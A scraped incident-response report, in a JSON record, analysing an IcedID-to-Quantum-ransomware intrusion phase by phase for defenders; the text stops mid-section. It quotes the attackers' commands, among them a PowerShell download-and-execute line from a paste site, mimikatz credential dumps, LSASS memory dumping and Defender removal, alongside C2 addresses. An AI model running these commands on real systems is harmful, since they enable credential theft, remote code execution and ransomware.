{
	"id": "879b4994-638d-480b-890b-694c08c23b52",
	"created_at": "2026-04-06T00:17:20.376792Z",
	"updated_at": "2026-04-10T03:24:24.000031Z",
	"deleted_at": null,
	"sha1_hash": "eb3444ea8d32605e1e3085e287554ec9bb571a0c",
	"title": "Malicious ISO File Leads to Domain Wide Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8410518,
	"plain_text": "Malicious ISO File Leads to Domain Wide Ransomware\r\nBy editor\r\nPublished: 2023-04-03 · Archived: 2026-04-05 23:43:48 UTC\r\nIcedID continues to deliver malspam emails to facilitate a compromise. This case covers the activity from a campaign in late\r\nSeptember of 2022. Post exploitation activities detail some familiar and some new techniques and tooling, which led to \r\ndomain wide ransomware.\r\nThis case shares similarities of the IcedID campaign detailed by Malware-Traffic-Analysis.net, where the ADGet.exe\r\napplication was referenced.\r\nServices\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences using real data from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nThis intrusion began by the execution of IcedID malware contained within an ISO image. The ISO file was delivered to the\r\nvictim as part of a malspam campaign. Delivering payloads using an ISO image is a common technique observed in several\r\nprior cases. This technique has grown in use as threat actors look to evade Mark-of-the-Web controls.\r\nThe ISO image delivered a hidden directory containing a IcedID payload and a batch file. After being successfully mounted\r\n(double clicked), the end user only sees a malicious LNK file named documents inside the virtual hard drive. 
Clicking on the\r\nLNK file executes the batch file, which copies the IcedID payload to the user’s AppData\\Local\\Temp folder and loads it\r\nusing rundll32. A scheduled task was created at that time to maintain persistence on this host as well.\r\nUpon the execution of the IcedID payload, discovery commands using Windows utilities such as net, nltest, and ipconfig\r\nwere executed to discover domain trusts, domain admins, workstation configuration, etc. Around 16 hours after the initial\r\nexecution, the first Cobalt Strike beacon DLL was executed from the IcedID malware. This led to another round of\r\ndiscovery using net followed by AdFind.\r\nThe threat actor installed Atera and Splashtop remote access software via an MSI file. After that, the threat actors tried a\r\nGetSystem privilege escalation technique, which was blocked by antivirus. The threat actor then proceeded to exploit CVE-2020-1472 (ZeroLogon). This was followed by a batch script used to perform DNS lookups on hosts across the\r\nenvironment. After this, the threat actors began their first lateral movement to a server in the environment by copying their\r\nCobalt Strike DLL over to the host and executing it via a remote service. They then repeated the install of the remote access\r\nsoftware package.\r\nSome two hours later, another Cobalt Strike beacon was executed. With this beacon, the threat actors succeeded in elevating\r\nto SYSTEM on the beachhead host and proceeded to dump LSASS memory. Another round of activity took place using\r\nsystem tools, batch files, and ADGet. Several more beacons were also loaded on the host using DLLs and PowerShell.\r\nAt this point, the threat actors had the cleartext credentials for one of the domain administrator accounts and began moving\r\nlaterally to other systems. They issued remote commands using WMIC to conduct discovery, as well as to distribute and\r\nexecute Cobalt Strike beacons. 
These actions, however, failed to get a beacon to launch on the domain controller being\r\ntargeted. After an hour or so of failures, the threat actors proceeded to RDP into the domain controller. Once there, they then\r\nloaded textbin[.]net, a pastebin style site, to download Cobalt Strike PowerShell code to the host in a file named pon.txt.\r\nTrying to execute this locally failed as well, and the threat actor moved on to downloading a variety of beacon executables\r\n(e.g. lsass.exe, lsasss.exe, etc.). These beacons, however, continued to crash and fail to run. Around an hour after starting the\r\nRDP session, the threat actors executed a PowerShell command to disable Windows Defender Antivirus on the host and\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 1 of 46\n\nreviewed Group Policy Objects for the domain. The Cobalt Strike beacons then began to execute successfully on the domain\r\ncontroller. Now, with Cobalt Strike beacons on the domain controller, the threat actors continued with discovery actions\r\nusing Invoke-ShareFinder and other PowerShell and system utilities.\r\nA few hours after, the threat actors installed the RSAT tools onto the beachhead host. However, they appear to have been\r\nunfamiliar with the tools and called up the help menu before using Get-ADComputer to collect the details on hosts in the\r\nenvironment. Back on the domain controller, ProcDump was used to dump LSASS memory. The PowerShell command Get-EventLog was then used to collect logon events on all domain administrators in the network.\r\nThe threat actors went quiet for around seven hours. When they returned, several more Cobalt Strike beacons were launched\r\nand several different Mimikatz implementations were executed on the domain controller, including a Mimikatz executable\r\nand a PowerShell implementation. 
For the next several hours, repeats of previous discovery actions and additional beacons\r\nexecuted using remote WMIC commands were observed. During this time, Windows event logs point to the threat actors\r\ncompleting DCSync activities on one of the domain controllers. A new batch file, localdisk.bat, was also executed using\r\nremote WMI commands, to collect disk data on hosts around the environment. These discovery actions were completed\r\nseveral more times in various other batch files.\r\nAt the start of the fourth day, the threat actors continued to repeat their previous discovery and beacon spreading activity.\r\nNear the end of the day, the threat actors moved to install AnyDesk on several servers including a backup management host,\r\nlikely as a further means of persistence or later command and control. Next, the threat actor executed PowerShell to pop up\r\nan alert message on several hosts, letting the user know that the machine was infected with Cobalt Strike.\r\nAfter completing this activity, they used Rclone to exfiltrate copies of the backup files to the Mega.io cloud storage service.\r\nThe threat actors then staged a ransomware binary on the backup server but did not immediately execute it.\r\nAround two hours after dropping the file, it was executed using a command line argument, which included a list of hosts to\r\ntarget. This appeared to fail. The threat actors then proceeded to execute the payload manually in several ways, across\r\nvarious hosts. Finally, they connected to a domain controller and dropped three scripts: one to copy the ransomware\r\nexecutable to all hosts, one to reset every user's password in the organization, and a final one to execute the staged\r\nransomware payload using PsExec.\r\nOnce executed, the ransomware left the ransom note README_TO_DECRYPT.html, which informs the victim that\r\nQuantum ransomware is responsible for the intrusion. 
The time to ransomware was just over 78 hours from the initial\r\nIcedID infection. All domain joined systems were encrypted with Quantum ransomware.\r\nAnalysts\r\nAnalysis and reporting completed by @_pete_0 and @MetallicHack.\r\nInitial Access\r\nThis intrusion began with the execution of a malicious LNK embedded in an ISO file (masquerading as a folder). The ISO file\r\nwas delivered as a ZIP archive via a malicious spam mail campaign.\r\nMalicious ISO file\r\nFirst, the user clicked on the ISO file, which created a new virtual hard disk. Such activity can be tracked with Event\r\n12 from Microsoft-Windows-VHDMP/Operational.\r\nThis ISO file contains a LNK named documents and a hidden directory named max containing a Cobalt Strike DLL beacon\r\nand a batch file.\r\nAs we can see below using LECmd by Eric Zimmerman, the file documents.lnk points to max\\eyewear.bat.\r\nAs a consequence, when the victim clicked on the LNK file, it triggered the execution of the batch file eyewear.bat.\r\nThe batch file eyewear.bat then executed two commands:\r\nIt first moved a DLL file named eyewear.dat, initially located in a hidden folder named max, to the user’s\r\nAppData\\Local\\Temp\\ folder:\r\nC:\\Windows\\system32\\cmd.exe /c D:\\max\\eyewear.bat\r\n➝ xcopy /s /i /e /h max\\easygoing.dat C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\*\r\nThen, the DLL was executed using rundll32.exe:\r\nC:\\Windows\\system32\\cmd.exe /c D:\\max\\eyewear.bat\r\n➝ rundll32 C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\easygoing.dat,#1\r\nWant to block ISOs from automatically mounting when double clicked? 
Check out Huntress’s recent writeup.\r\nExecution\r\nOn the second day of the intrusion, the threat actors used the IcedID malware to drop a Cobalt Strike beacon and execute it\r\nusing regsvr32.exe.\r\nAfter beginning to move laterally, the threat actors used many other execution techniques such as PowerShell and\r\nexecutables run from their interactive RDP session in addition to DLLs.\r\nA number of application crashes were observed across several compromised hosts. This activity was a result of the threat\r\nactors attempting to execute various dropped tools or beacons on the endpoint, triggering a Windows Error Reporting\r\n(WER) fault process.\r\nApplication crashes are recorded in the Windows Application event log under Event IDs 1000 and 1001.\r\nThe NSA Cyber Windows Event Monitoring Guidance has the following statement:\r\nApplication crashes may warrant investigation to determine if the crash is malicious or benign.\r\nIn this case, the threat actors attempted to rectify the issue by deploying new beacons, renaming executable files by either\r\nappending a double extension or adding extra characters to the filename (e.g. lsass.exe to lsasss.exe).\r\nSome of these crashes may have been in response to being detected by Microsoft Defender. 
These signatures were found in\r\nthe logs on various hosts.\r\nHackTool:Win32/NamedPipeImpers.A\r\nTrojanDropper:PowerShell/Cobacis.B\r\nVirTool:MSIL/Menace.C!MTB\r\nThere was evidence that the Cobalt Strike aggressor script AnnoyKit was leveraged to launch Internet Explorer via a\r\nCOM object.\r\nDecoded from Base64:\r\nThe decoded PowerShell function is readable in the PowerShell logs:\r\nThe PowerShell script used is publicly available, and can be found here, along with the CNA script.\r\nWe were unable to ascertain the purpose of running this script or how it furthered the threat actor’s goals.\r\nPersistence\r\nIcedID created a DLL named Utucka.dll just after the initial execution.\r\nA scheduled task was then created using this same DLL.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cURI\u003e\\{3A79715D-4FFB-50BE-8F3A-090CE7FB4097}\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cTimeTrigger id=\"TimeTrigger\"\u003e\r\n \u003cRepetition\u003e\r\n \u003cInterval\u003ePT1H\u003c/Interval\u003e\r\n \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n \u003c/Repetition\u003e\r\n \u003cStartBoundary\u003e2012-01-01T12:00:00\u003c/StartBoundary\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003c/TimeTrigger\u003e\r\n \u003cLogonTrigger id=\"LogonTrigger\"\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n 
\u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cDuration\u003ePT10M\u003c/Duration\u003e\r\n \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003erundll32.exe\u003c/Command\u003e\r\n \u003cArguments\u003e\"C:\\Users\\[REDACTED]\\AppData\\Local\\[REDACTED]\\[REDACTED]\\Utucka.dll\",#1 --oxoj=\"CategoryBeyon\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nFirst execution was observed on Day 1 at 8:00 PM and was repeated every hour.\r\nC:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule\r\n ➝ rundll32.exe 
\"C:\\Users\\[REDACTED]\\AppData\\Local\\[REDACTED]\\[REDACTED]\\Utucka.dll\",#1 --oxoj=\"CategoryBeyo\r\nPrivilege Escalation\r\nNamed pipe impersonation\r\nThe named pipe impersonation technique was used multiple times on different hosts in order to get SYSTEM privileges. This is\r\na common technique used by threat actors, and implemented by the GetSystem Cobalt Strike command. As seen in the\r\nscreenshot below, GetSystem creates a service and connects to a pipe.\r\ncmd.exe /c echo nbproc \u003e \\\\.\\pipe\\nbproc\r\ncmd.exe /c echo xgxfpw \u003e \\\\.\\pipe\\xgxfpw\r\ncmd.exe /c echo ylfdup \u003e \\\\.\\pipe\\ylfdup\r\nThe beacon creates the named pipe (seen in Sysmon Event ID 17) and impersonates the NT AUTHORITY\\SYSTEM account\r\nused to connect to the pipe.\r\nThe MITRE Cyber Analytics Repository (CAR) details the GetSystem elevation in CAR-2021-02-002: Get System Elevation.\r\nWinlogon Token Impersonation/Theft\r\nMultiple accesses to WinLogon with granted access 0x40 (PROCESS_DUP_HANDLE) were performed. Such access can be\r\ntracked with Sysmon Event ID 10 (ProcessAccess). As explained in this blog written by Jonathan Johnson, opening a\r\nhandle to WinLogon in order to duplicate the token and call ImpersonateLoggedOnUser is a known Cobalt Strike technique.\r\nZeroLogon\r\nOn the second day of the intrusion, a spike in NetLogon traffic was observed from the beachhead host to a domain\r\ncontroller. 
This traffic then triggered several network signatures for CVE-2020-1472, otherwise known as ZeroLogon.\r\nET EXPLOIT Possible Zerologon Phase 1/3 - NetrServerReqChallenge with 0x00 Client Challenge (CVE-2020-1472)\r\nET EXPLOIT Zerologon Phase 2/3 - NetrServerAuthenticate2 Request with 0x00 Client Challenge and Sign and Seal\r\nET EXPLOIT Zerologon Phase 3/3 - Malicious NetrServerPasswordSet2 (CVE-2020-1472)\r\nThe event logs corroborated a successful exploitation with a password update Event 4742 for one of the Domain Controller\r\npasswords.\r\nDefense Evasion\r\nMark-of-the-Web Bypass\r\nThe threat actors delivered the initial malware as a zip file, with the contents of an ISO file, which contained their payload to\r\ngain access to the target environment. These packages are designed to evade controls such as Mark-of-the-Web restrictions.\r\nWindows Defender tampering\r\nOn one host, the threat actors ran the following command to try and clear the way for their activity, likely due to the\r\ndifficulty the threat actors were having with beacons crashing.\r\npowershell.exe Uninstall-WindowsFeature -Name Windows-Defender-GUI\r\nThis command was downloaded from a remote site to a file named pon!.txt and then executed locally.\r\nProcess injection\r\nMultiple suspicious calls to the function CreateRemoteThread (Sysmon Event ID 8) were observed. This is a known\r\nbehavior of Cobalt Strike and its function shinject, which can be used to inject a new beacon or a specific program into\r\nanother process on the victim’s computer.\r\nAs a result, we observed abnormal winlogon.exe process behavior; winlogon.exe performed DNS requests (Sysmon Event\r\nID 22) to a Cobalt Strike C2 domain guteyutu[.]com.\r\nThe injection is also visible from memory dumps. 
Several hosts showed rundll32 processes exhibiting common process\r\ninjection behavior, where the MZ file header is seen at the starting memory address in rundll32 processes with\r\nPAGE_EXECUTE_READWRITE permissions.\r\nMany of these beacons could also be detected in memory scanning with the Malpedia Cobalt Strike rule. A sample of a\r\nscanning run is displayed below:\r\nHost | Process ID | Process Name | Command Line | Yara Rule\r\nSERVERA | 568 | winlogon.exe | winlogon.exe | win_cobalt_strike_auto\r\nSERVERA | 4284 | RuntimeBroker.exe | C:\\Windows\\System32\\RuntimeBroker.exe -Embedding | win_cobalt_strike_auto\r\nSERVERB | 9936 | rundll32.exe | C:\\Windows\\syswow64\\rundll32.exe | win_cobalt_strike_auto\r\nBEACHHEAD | 996 | svchost.exe | C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p -s LSM | win_cobalt_strike_auto\r\nBEACHHEAD | 1888 | svchost.exe | C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | win_cobalt_strike_auto\r\nBEACHHEAD | 2220 | winlogon.exe | winlogon.exe | win_cobalt_strike_auto\r\nBEACHHEAD | 7032 | rundll32.exe | C:\\Windows\\syswow64\\rundll32.exe | win_cobalt_strike_auto\r\nSERVERC | 3328 | rundll32.exe | C:\\Windows\\syswow64\\rundll32.exe | win_cobalt_strike_auto\r\nCredential Access\r\nMultiple tools and scripts were used to access and collect credentials from compromised hosts. 
There were several variants\r\nof Mimikatz in binary and PowerShell form:\r\n\"C:\\ProgramData\\mimikatz.exe\"\r\n\"C:\\ProgramData\\mimikatz.exe.exe\"\r\n\"C:\\ProgramData\\mimikatz_cryptovanniy.exe\"\r\n\"C:\\ProgramData\\notepad.exe\" \"C:\\ProgramData\\katz.ps1\r\nCommands used to collect credentials and export to text files stored in the C:\\ProgramData folder included the following:\r\nC:\\Windows\\system32\\cmd.exe /C mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\" \u003e\u003e c:\\program\r\nC:\\Windows\\system32\\cmd.exe /C mimikatz.exe privilege::debug sekurlsa::logonPasswords full samdump::hashes exi\r\nC:\\Windows\\system32\\cmd.exe powershell -ep bypass -C \"import-module .\\katz.ps1;Invoke-Katz\" \u003e mimi.txt\r\nDCSync\r\nCredentials were also dumped via DCSync using two compromised high-privilege accounts. The activity was observed in\r\nWindows Security Event ID 4662, with known indicators including a non-computer account, an access mask of 0x100,\r\nand the following object IDs:\r\n1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 - DS-Replication-Get-Changes-All\r\n1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 - DS-Replication-Get-Changes\r\nDCSync was observed across 12 events, with separate events for each object ID. 
It is likely the operator used the Cobalt\r\nStrike DCSync command, having observed them already enter this directly in the host OS command shell.\r\nFor additional details, SpecterOps has an article covering the DCSync technique.\r\nCode injection in LSASS\r\nMultiple injections into the LSASS process were observed on multiple hosts.\r\nThreat actors used the function CreateRemoteThread in order to inject malicious code into the LSASS process to access\r\ncredentials.\r\nA process dump of LSASS was taken using the Sysinternals ProcDump utility:\r\nThis process was invoked by RunDLL32.exe, which was an injected Cobalt Strike beacon reaching out to the command and\r\ncontrol server at 111.90.143[.]191.\r\nC:\\Windows\\SysWOW64\\rundll32.exe\r\n ➝ c:\\windows\\temp\\procdump64.exe -accepteula -ma lsass.exe fwtsqmfile00.dmp\r\nDiscovery\r\nClassic ransomware discovery stages\r\nA number of familiar discovery techniques were carried out using various OS commands to discover information relating to the\r\nuser, host, and network configuration. 
Standard time discovery, domain trust discovery, workstation configuration discovery,\r\nand use of the net command to discover standard accounts and groups were observed.\r\nFrom the IcedID malware running via Rundll32, the following LOLBAS commands were observed:\r\nrundll32 C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\easygoing.dat,#1\r\n➝ nltest /domain_trusts /all_trusts\r\n➝ nltest /domain_trusts\r\n➝ net view /all /domain\r\n➝ net view /all\r\n➝ net group \"Domain Admins\" /domain\r\n➝ cmd.exe /c chcp \u003e\u00262\r\n➝ ipconfig /all\r\n➝ net config workstation\r\n ➝ systeminfo\r\nFrom Nigu.exe (Cobalt Strike beacon), the following LOLBAS commands were observed:\r\n\"C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\Nigu.exe\"\r\n➝ C:\\Windows\\system32\\cmd.exe /C net group \"domain admins\" /domain\r\n➝ C:\\Windows\\system32\\cmd.exe /C net group \"enterprise admins\" /domain\r\n➝ C:\\Windows\\system32\\cmd.exe /C net time\r\n➝ C:\\Windows\\system32\\cmd.exe /C net user [REDACTED] /domain\r\nDiscovery commands observed from other Cobalt Strike beacons using LOLBAS included:\r\nsysteminfo\r\nnetstat -anop tcp\r\ncmd.exe /C echo %%temp%%\r\ncmd.exe /C hostname\r\ncmd.exe /C nslookup hostname\r\nRSAT installation to enumerate domain computer properties\r\nFollowing the first discovery stage, the threat actor installed RSAT (Remote Server Administration Tools) on the beachhead\r\nhost, which contains the ActiveDirectory PowerShell Module.\r\nrundll32.exe\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Add-WindowsCapability –online –Name “Rsat.ActiveDirec\r\n ➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Import-Module ActiveDirectory\r\nOne interesting detail: the threat actors had to consult the help for Get-ADComputer and Export-CSV using\r\nGet-Help.\r\nrundll32.exe\r\n ➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-Help 
Export-CSV\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-Help Get-ADComputer\r\nDomain computers’ properties were then enumerated using the Get-ADComputer PowerShell cmdlet, and names were\r\nexported to a CSV file named ADComputers.csv.\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-ADComputer -Filter * -Properties * | Export-CSV \"\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-ADComputer -Filter * -Properties * | Export-CSV -\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-ADComputer -Filter * -Properties * | Export-csv C\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe Get-ADComputer -Identity [REDACTED] -Properties *\r\n➝ C:\\Windows\\system32\\cmd.exe /C powershell.exe get-ADcomputer -Filter * | Where-Object {$a=$_.name;\r\nIn addition, the threat actors searched for Active Directory related DLLs in other directories:\r\nC:\\Windows\\system32\\cmd.exe /C dir /s *file/ Microsoft.ActiveDirectory.Management.dll\r\nC:\\Windows\\system32\\cmd.exe /C where /r C:\\Windows\\WinSxS\\ *Microsoft.ActiveDirectory.Management.dll*\r\nHands on keyboard!\r\nWe observed mistakes made by the threat actors during hands-on keyboard activities; these included typos and incorrect use\r\nof commands. 
An example of an incorrectly named command was nslook up (should have been nslookup), which also incorrectly\r\npassed the username instead of the host name.\r\nC:\\Windows\\system32\\cmd.exe /C nslook up [REDACTED]\r\nC:\\Windows\\system32\\cmd.exe /C nslookup USERFirstName UserLastName\r\nAnother example, the misspelling of administrators:\r\nnet group administartors /domain\r\nFurther examples included typos of commands:\r\nC:\\Windows\\system32\\cmd.exe /C net ttime\r\nOther operator errors observed included Cobalt Strike commands being passed as a parameter instead of a beacon\r\ntask.\r\nThe use of DCSync is documented in a previous TheDFIRReport titled ‘Cobalt Strike, a Defender’s Guide’.\r\nDuring AD enumeration, the operator made use of the PowerShell Get-Help cmdlet to troubleshoot the following:\r\npowershell.exe Get-Help Export-CSV\r\npowershell.exe Get-Help Get-ADComputer\r\nTwo file sharing web sites were used to access files; these were dropmefiles[.]com and file[.]io. Both of these services were\r\naccessed on day two from one Domain Controller on the network, with file downloads relating to tooling/scripts. On day\r\nthree, a second Domain Controller was observed accessing the dropmefiles[.]com domain.\r\nReviewing the WebCacheV01.dat on the domain controllers reveals more details on the sites loaded, including the files that\r\nwere downloaded from those sites:\r\nThe threat actors downloaded the lsass.exe beacon from their attacker hosted infrastructure at 199.127.60[.]117.\r\nIn addition, the threat actors also used Internet Explorer on the domain controller to search Bing.\r\nIt is quite unusual to search directly in the victim’s browser. 
The current search results point to how to change the hidden\r\nview attribute in File Explorer in reference to the ProgramData folder.\r\nShare discovery with Invoke-ShareFinder\r\nOther tools observed in use included Invoke-ShareFinder, a common tool that we frequently encounter in cases for\r\nenumerating network shares and identifying data and potential targets. We have a detailed report covering Invoke-ShareFinder. In this case, there is a clear indication that the operator launched the Invoke-ShareFinder command via Cobalt\r\nStrike, as observed in Event ID 800:\r\nWindows Security Logs discovery\r\nOnce the threat actors had achieved privilege escalation by compromising administrator accounts, an unusual but interesting\r\ndiscovery technique was observed, as seen below.\r\nC:\\Windows\\system32\\cmd.exe /C powershell -c \"get-eventlog 'Security' | where {$_.Message -like '*\u003cREDACTED\u003e*\r\nExecuting this query would return all events in the Security log that reference the specified account and a source\r\nnetwork address. Events returned would include process creation, logins, etc.\r\nIt is likely that this discovery technique forms an extension of T1033 – System Owner/User Discovery, where the threat actor\r\nwas leveraging this data source to understand the account's pattern of life, any indicators of compromise, and to potentially\r\nblend in adversary activities.\r\nBase64 for the win\r\nOther discovery activities observed included a domain host discovery script via PowerShell. This was double base64\r\nencoded.\r\nDecoding this revealed another PowerShell Base64 encoded string:\r\nThe -e is short for -EncodedCommand. The base64 encoding starts with JAB, which is a common pattern for UTF-16 starting\r\nwith $. 
Refer to the Base64 cheatsheet by Florian Roth here.\r\nThere are many different variations of EncodedCommand, with shorthand and aliases available. Unit42 (Palo Alto) provides\r\na good article on trends and observations of PowerShell encoded commands:\r\nDecoding this again using CyberChef shows the resulting PowerShell script:\r\nMore tools dropped by threat actors\r\nOther binaries and scripts were dropped onto one endpoint:\r\nThe ns.bat file contained thousands of nslookup commands with a corresponding hostname from the network, with output\r\nappended to a ns.txt file.\r\nADGet\r\nAn Active Directory collection tool named ADGet was dropped into a user’s temp folder and executed with an output\r\nfilename argument. No file metadata is provided. It is a simple-to-use tool: the application is invoked from the command line\r\nand passed an output file name to save enumerated AD objects.\r\nADGet is an uncommon tool; however, its function is very similar to AdFind. The key difference is that LDAP queries are\r\nnot passed as arguments; they are instead coded into the binary itself.\r\nThe AD objects will be enumerated, generating a zip output file containing the following TSV (tab separated) files if\r\nusing a default configuration:\r\nThese files can be viewed with any editor or reader that supports CSV or TSV.\r\nAdFind\r\nWhile ADGet was used, prior to that tool being run the threat actors also deployed the tried and true AdFind, which was\r\nrenamed to find.exe and called using find.bat.\r\nAnother batch file named AD.bat was dropped into the ProgramData folder on one host and used AdFind to enumerate AD\r\nobjects.\r\nThe AD.bat file had the following commands:\r\nfor /f \"delims=\" %%A in ('dir /s /b %WINDIR%\\system32\\*htable.xsl') do set 
\"var=%%A\"\r\nadfind.exe -f (objectcategory=person) \u003e ad_users.txt\r\nadfind.exe -f objectcategory=computer \u003e ad_computers.txt\r\nadfind.exe -f objectcategory=computer -csv name operatingSystem \u003e ad_computers_enum.txt\r\nadfind.exe -f (objectcategory=organizationalUnit) \u003e ad_ous.txt\r\nadfind.exe -subnets -f (objectCategory=subnet) \u003e ad_subnets.txt\r\nadfind.exe -f \"(objectcategory=group)\" \u003e ad_group.txt\r\nadfind.exe -gcb -sc trustdmp \u003e ad_trustdmp.txt\r\nInterestingly, the first line in the batch file denotes the WMI output configuration in HTML form (from the XSL file\r\nc:\\windows\\system32\\wbem\\en-US\\htable.xsl). The HTML was never used. It's likely the code was reused from other open\r\nsource pentest enumeration scripts available, such as:\r\nWMIC\r\nWMIC was leveraged by a batch file named dS.bat that queried a number of target hosts to determine each host's\r\ndisk drive configuration. 
This can be useful to determine drives, including mounted network shares.\r\nwmic /node:\u003cREDACTED\u003e /user:\"\u003cREDACTED\u003e\" /password:\"\u003cREDACTED\u003e\" logicaldisk get caption,description,drivetype\r\nThe dS.bat file was executed by the injected Rundll32.exe process.\r\nDuring hands-on discovery by the threat actors, the Microsoft Management Console application was used to view Domain\r\nGroup Policy Objects.\r\nThis can provide useful information concerning any restrictions or configuration settings for hosts on the network.\r\nLateral Movement\r\nWMI\r\nThreat actors used wmic.exe in order to execute PowerShell Cobalt Strike beacons on multiple workstations and servers.\r\nThe payloads were stored on textbin[.]net.\r\nAs we can see above, WmiPrvSe.exe (WMI Provider Host) executed the PowerShell Cobalt Strike beacon on the remote\r\ncomputers.\r\nRemote Desktop Protocol\r\nThe beacon C:\\ProgramData\\lsass.exe was used to proxy RDP connections and connect to another computer.\r\nProxying RDP traffic via a process such as a Cobalt Strike beacon reduces the exposure of the threat actor’s own\r\ninfrastructure, and blends RDP activity in with that of internal hosts on the network.\r\nRDP was used extensively throughout the intrusion, via a variety of processes (beacon-injected or standalone).\r\nThe common processes observed were two injected processes, and Nigu.exe/lsass.exe.\r\nThese processes are unusual for establishing RDP connections. During these RDP sessions, the threat actors often opened\r\nInternet Explorer to download their beacons or commands they wanted to run on lateral hosts. 
An example would be pon.txt.\r\nThis file was opened during their RDP session and contained the PowerShell commands used to launch a new beacon:\r\n\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\REDACTED\\Downloads\\pon.txt\r\npon.txt contents:\r\npowershell iex((new-object net.webclient).downloadstring('https://textbin.net/raw/ls1jhefawt'))\r\nRemote Service\r\nRemote services were also created in order to propagate Cobalt Strike beacons in the network.\r\nAnyDesk\r\nAnyDesk was used to move laterally between a workstation and a backup server, as shown below with Sysmon Event ID 3\r\n(Network connection):\r\nCollection\r\nTo collect directory listings from multiple hosts, the threat actors used the dir command through the\r\nadministrative share c$ and redirected the output to a text file named listing.txt.\r\nC:\\Windows\\System32\\cmd.exe /C dir \\\\[REDACTED HOST]\\c$\\users \u003e\u003e listing.txt\r\nIn addition, multiple text files were also created to store the output of various discovery commands and scripts.\r\nC:\\ProgramData\\qwe3.txt\r\nC:\\Users\\[REDACTED USER]\\Downloads\\sns.txt\r\nC:\\Windows\\Temp\\events_Administrator.text\r\nC:\\Windows\\Temp\\events_[REDACTED USER].text\r\nC:\\Windows\\Temp\\listing.txt\r\nC:\\Windows\\Temp\\ns.txt\r\nC:\\Windows\\Temp\\nsserv.txt\r\nCommand and Control\r\nIcedID\r\nThe malware configuration:\r\nConfiguration details:\r\n{\"Campaign ID\": 2220668032, \"C2 url\": \"alockajilly.com\"}\r\nInitially, the IcedID malware made a connection to 64.227.12[.]180:80 for its first callback. This aligns with the domain\r\npresent in the malware configuration 